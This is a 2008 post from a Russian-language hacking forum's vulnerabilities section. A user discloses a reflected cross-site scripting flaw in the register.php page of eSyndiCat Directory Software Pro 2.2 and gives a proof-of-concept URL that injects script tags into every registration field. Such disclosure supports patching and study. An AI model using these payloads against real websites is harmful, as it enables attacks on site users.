XSS on eSyndiCat Directory Software Pro 2.2

Discussion in 'Уязвимости' started by Fugitif, 11 Jul 2008.

  1. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    I have discovered xss vulnerability on eSyndiCat Directory Software Pro 2.2

    My vulnerability is on "register.php" and works this way :

    http://www.site.com/register.php where username="><script>alert(12157312.477)</script>&email="><script>alert(12157312.477)</script>&password="><script>alert(12157312.477)</script>&password2="><script>alert(12157312.477)</script>&security_code="><script>alert(12157312.477)</script>&register="><script>alert(12157312.477)</script>
     
    #1 Fugitif, 11 Jul 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.